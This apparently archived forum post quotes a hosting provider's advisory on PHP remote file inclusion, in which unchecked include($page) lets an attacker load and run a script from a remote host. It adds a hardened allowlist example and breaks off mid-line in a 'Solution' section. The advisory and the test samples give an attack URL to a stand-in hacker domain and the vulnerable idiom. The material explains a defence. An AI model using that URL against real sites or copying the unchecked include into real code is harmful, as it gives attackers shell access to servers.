PHP blamed for security problems


Problem description


Here's what this morning's security advisory read here:

"In the last 3 months we have noticed a marked increase in the number of
web-server attacks and successful compromise on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_open change to PHP is about as much as we can do here."

They offer a more detailed description of the problem:

"Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfully gained
shell access via insecure PHP scripts.

Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.

As you may be aware, PHP provides a number of functions for
opening files such as 'fopen()' and it's also possible to
pass an HTTP or FTP URL to these such that
fopen('http://www.dsvr.co.uk/'); will fetch the contents of
the DSVR homepage for PHP to treat as a file.

What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.

Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. These
pages can be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard
header/footer.

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption."
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
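As an added example that is not part of the original post or the provider's advisory, the following pairs the `include($page)` idiom quoted above with a hardened version that treats the `page` parameter only as a key into a fixed allowlist, so no client-supplied string ever reaches include(). It also reports the `allow_url_include` directive (PHP 5.2 and later), which governs exactly the include()-of-URL behaviour the advisory describes; the page names and the pages/ directory are assumptions.

```php
<?php
// Added example, not code from the original post or the provider's advisory.
// The vulnerable idiom the advisory quotes is  include($page)  with $page taken
// straight from ?page=..., so a URL can be included. The version below maps the
// request through a fixed allowlist instead. File names and the pages/ directory
// are assumptions made for this demonstration.
declare(strict_types=1);

// Fixed map of page names to files. Only these values can ever be included.
const ALLOWED_PAGES = [
    'home'  => 'home.inc',
    'about' => 'about.inc',
    'faq'   => 'faq.inc',
];

/**
 * Map the requested page name to a file under $baseDir, or return null when
 * the name is not in ALLOWED_PAGES. Nothing from the request is used as a path.
 */
function resolvePage(?string $requested, string $baseDir): ?string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . ALLOWED_PAGES[$requested];
}

/** True if this PHP still allows include() of http:// or ftp:// URLs at all. */
function urlIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed sample inputs: a valid key, the old file-name style, the
// remote-URL shape quoted in the advisory, and a missing parameter.
// Only the first is accepted.
$samples = ['about', 'about.inc', 'http://www.hacker-domain.co.uk/my-root-script.txt', null];
foreach ($samples as $s) {
    $resolved = resolvePage($s, __DIR__ . '/pages');
    printf("%-55s => %s\n", var_export($s, true), $resolved ?? 'rejected');
}
printf("allow_url_include is %s\n", urlIncludeEnabled() ? 'On (should be Off)' : 'Off');

// In a real index.php the handler would be:
// $file = resolvePage($_GET['page'] ?? null, __DIR__ . '/pages');
// if ($file === null) { http_response_code(404); exit('Unknown page'); }
// include $file;
```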

Solution



> Many clients seem to be using PHP that looks like this:


<html>
...standard header...
<? include(

